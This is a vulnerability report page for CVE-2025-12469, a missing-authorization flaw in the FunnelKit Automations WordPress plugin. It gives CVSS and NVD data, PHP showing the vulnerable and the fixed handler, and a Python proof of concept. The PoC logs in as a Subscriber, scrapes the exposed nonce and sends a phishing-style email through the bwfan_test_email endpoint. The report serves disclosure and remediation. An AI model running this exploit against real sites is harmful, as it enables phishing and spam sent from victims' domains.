Security Vulnerability Report
CVE-2025-12469 CVSS 4.3 MEDIUM

CVE-2025-12469

Published: 2025-11-05 10:15:36
Last Modified: 2025-12-04 14:03:19

Description

The FunnelKit Automations – Email Marketing Automation and CRM for WordPress & WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.6.4.1. This is due to the plugin not properly verifying that a user is authorized to perform administrative actions in the `bwfan_test_email` AJAX handler. The nonce used for verification is publicly exposed to all visitors (including unauthenticated users) via the frontend JavaScript localization, and the `check_nonce()` function accepts low-privilege authenticated users who possess this nonce. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send arbitrary emails from the site with attacker-controlled subject and body content.
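As an added illustration (not FunnelKit's code, and not the patched code from the referenced changeset), here is the generic WordPress pattern the description points at: an AJAX handler whose only gate is a nonce that the plugin localizes into the public front-end JavaScript, next to a hardened version that keeps the nonce as a CSRF check and adds the missing capability check. The hook, action, capability and field names (`example_test_email`, `manage_options`, `to`, `subject`, `body`) are assumptions made for the example.

```php
<?php
/**
 * Added illustration of the CWE-862 pattern behind CVE-2025-12469 and its fix.
 * This is NOT FunnelKit's code; hook, action, capability and field names are
 * assumed for the example.
 */

// Both variants hand the same nonce to every front-end visitor, logged in or
// not, through wp_localize_script(). That is normal for a CSRF token, and it
// is exactly why a nonce can never double as an authorization check.
add_action( 'wp_enqueue_scripts', function () {
    wp_enqueue_script( 'example-public', plugins_url( 'public.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-public', 'examplePublic', array(
        'ajax_url' => admin_url( 'admin-ajax.php' ),
        'nonce'    => wp_create_nonce( 'example-test-email' ),
    ) );
} );

// VULNERABLE: wp_ajax_* is reachable by every logged-in role, and the handler
// only checks the nonce. A Subscriber who read the nonce from the page source
// passes and can send mail with an arbitrary subject and body.
add_action( 'wp_ajax_example_test_email', 'example_test_email_vulnerable' );
function example_test_email_vulnerable() {
    if ( ! wp_verify_nonce( $_POST['nonce'] ?? '', 'example-test-email' ) ) {
        wp_send_json_error( 'bad nonce', 403 );
    }
    wp_mail(
        sanitize_email( wp_unslash( $_POST['to'] ?? '' ) ),
        sanitize_text_field( wp_unslash( $_POST['subject'] ?? '' ) ),
        wp_kses_post( wp_unslash( $_POST['body'] ?? '' ) )
    );
    wp_send_json_success();
}

// FIXED: keep the nonce as the CSRF check, then require the capability that
// actually gates the administrative feature. Nothing about the exposed nonce
// has to change for this to be safe.
add_action( 'wp_ajax_example_test_email_fixed', 'example_test_email_fixed' );
function example_test_email_fixed() {
    check_ajax_referer( 'example-test-email', 'nonce' ); // dies with -1 / HTTP 403 on failure
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    $to = sanitize_email( wp_unslash( $_POST['to'] ?? '' ) );
    if ( ! is_email( $to ) ) {
        wp_send_json_error( 'invalid recipient', 400 );
    }
    $subject = sanitize_text_field( wp_unslash( $_POST['subject'] ?? '' ) );
    $body    = wp_kses_post( wp_unslash( $_POST['body'] ?? '' ) );
    if ( ! wp_mail( $to, $subject, $body ) ) {
        wp_send_json_error( 'wp_mail failed', 500 );
    }
    wp_send_json_success();
}
```

To verify a fix of this shape, log in as a Subscriber, read the nonce from the page source and POST it to admin-ajax.php with the handler's action: the vulnerable handler sends the mail and returns `{"success":true}`, the fixed one returns HTTP 403 before `wp_mail()` is ever reached. How FunnelKit itself closed the hole should be read from the changeset listed under Patch in the references, not inferred from this example.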

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

cpe:2.3:a:funnelkit:funnelkit_automations:*:*:*:*:*:wordpress:*:* - VULNERABLE
FunnelKit Automations (wp-marketing-automations) <= 3.6.4.1
Fixed in 3.6.4.2 (changeset 3388822 to includes/abstracts/class-bwfan-ajax-controller.php)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re
import sys
from urllib.parse import urljoin

import requests

# CVE-2025-12469 PoC - FunnelKit Automations <= 3.6.4.1, missing authorization
# in the bwfan_test_email AJAX handler.
#
# The handler is reachable by any authenticated user (Subscriber and above) who
# holds the nonce the plugin localizes into the public front-end JavaScript, so
# the PoC logs in first and reuses that session for the nonce fetch and the
# AJAX call. The nonce-extraction patterns and the POST field names
# (_bwfan_nonce, email_to, email_subject, email_body, email_heading) are
# assumptions, not taken from the plugin source; confirm them against the
# referenced class-bwfan-public.php and class-bwfan-ajax-controller.php.

# WordPress nonces are 10 hex characters.
NONCE_PATTERNS = [
    r'bwfan_test_email.*?"([a-f0-9]{10})",\s*"bwfan_test_email"',
    r'"bwfan_nonce"\s*:\s*"([a-f0-9]+)"',
    r'ajaxurl.*?nonce.*?([a-f0-9]{10,})',
]


def login(session, target_url, username, password):
    """Authenticate as a low-privilege (Subscriber) user through wp-login.php."""
    login_url = urljoin(target_url, '/wp-login.php')
    # The GET makes WordPress set wordpress_test_cookie, which wp-login.php
    # insists on when testcookie=1 is posted.
    session.get(login_url, timeout=30)
    session.post(login_url, data={
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': urljoin(target_url, '/wp-admin/'),
        'testcookie': '1',
    }, timeout=30)
    # A successful login leaves a wordpress_logged_in_<hash> cookie in the jar.
    return any(c.name.startswith('wordpress_logged_in_') for c in session.cookies)


def get_nonce(session, target_url):
    """Extract the nonce from the front-end JavaScript localization.

    A logged-in user's nonce is bound to their session, so the page is fetched
    with the authenticated session rather than anonymously.
    """
    response = session.get(target_url, timeout=30)
    for pattern in NONCE_PATTERNS:
        match = re.search(pattern, response.text)
        if match:
            return match.group(1)
    return None


def exploit(target_url, username, password, recipient):
    """Send an attacker-controlled email through the vulnerable endpoint."""
    session = requests.Session()
    if not login(session, target_url, username, password):
        print('[-] Login failed')
        return False
    print(f'[+] Logged in as {username}')

    nonce = get_nonce(session, target_url)
    if not nonce:
        print('[-] Failed to obtain nonce')
        return False
    print(f'[+] Nonce obtained: {nonce}')

    ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    data = {
        'action': 'bwfan_test_email',
        '_bwfan_nonce': nonce,
        'email_to': recipient,
        'email_subject': 'Urgent: Account Security Alert',
        'email_body': 'Phishing content...',
        'email_heading': 'Security Team',
    }
    response = session.post(ajax_url, data=data, timeout=30)

    # admin-ajax.php answers an unknown action with HTTP 400 and a handled one
    # with 200; read the JSON "success" flag (assumes the handler replies via
    # wp_send_json_*) instead of substring-matching the body, which would also
    # match "success":false.
    try:
        sent = response.status_code == 200 and response.json().get('success') is True
    except ValueError:
        sent = False
    if sent:
        print('[+] Email sent successfully!')
    else:
        print(f'[-] Exploitation failed (HTTP {response.status_code}): {response.text[:200]}')
    return sent


if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f'Usage: python {sys.argv[0]} <target_url> <subscriber_user> <password> <recipient_email>')
        sys.exit(1)
    sys.exit(0 if exploit(*sys.argv[1:5]) else 1)

References

https://plugins.trac.wordpress.org/browser/wp-marketing-automations/trunk/includes/abstracts/class-bwfan-ajax-controller.php#L296 (Product)
https://plugins.trac.wordpress.org/browser/wp-marketing-automations/trunk/includes/class-bwfan-common.php#L1896 (Product)
https://plugins.trac.wordpress.org/browser/wp-marketing-automations/trunk/includes/class-bwfan-public.php#L70 (Product)
https://plugins.trac.wordpress.org/changeset/3388822/wp-marketing-automations/trunk/includes/abstracts/class-bwfan-ajax-controller.php (Patch)
https://www.wordfence.com/threat-intel/vulnerabilities/id/72198b74-90f6-49c6-b261-6f9c1cdc9692?source=cve (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12469", "sourceIdentifier": "[email protected]", "published": "2025-11-05T10:15:35.933", "lastModified": "2025-12-04T14:03:18.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FunnelKit Automations – Email Marketing Automation and CRM for WordPress & WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.6.4.1. This is due to the plugin not properly verifying that a user is authorized to perform administrative actions in the `bwfan_test_email` AJAX handler. The nonce used for verification is publicly exposed to all visitors (including unauthenticated users) via the frontend JavaScript localization, and the `check_nonce()` function accepts low-privilege authenticated users who possess this nonce. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send arbitrary emails from the site with attacker-controlled subject and body content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:funnelkit:funnelkit_automations:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.6.4.2", "matchCriteriaId": "3034084D-172A-4FE5-9A23-F7B4F45F4787"}]}]}], "references": [{"url": 
"https://plugins.trac.wordpress.org/browser/wp-marketing-automations/trunk/includes/abstracts/class-bwfan-ajax-controller.php#L296", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/wp-marketing-automations/trunk/includes/class-bwfan-common.php#L1896", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/wp-marketing-automations/trunk/includes/class-bwfan-public.php#L70", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3388822/wp-marketing-automations/trunk/includes/abstracts/class-bwfan-ajax-controller.php", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/72198b74-90f6-49c6-b261-6f9c1cdc9692?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}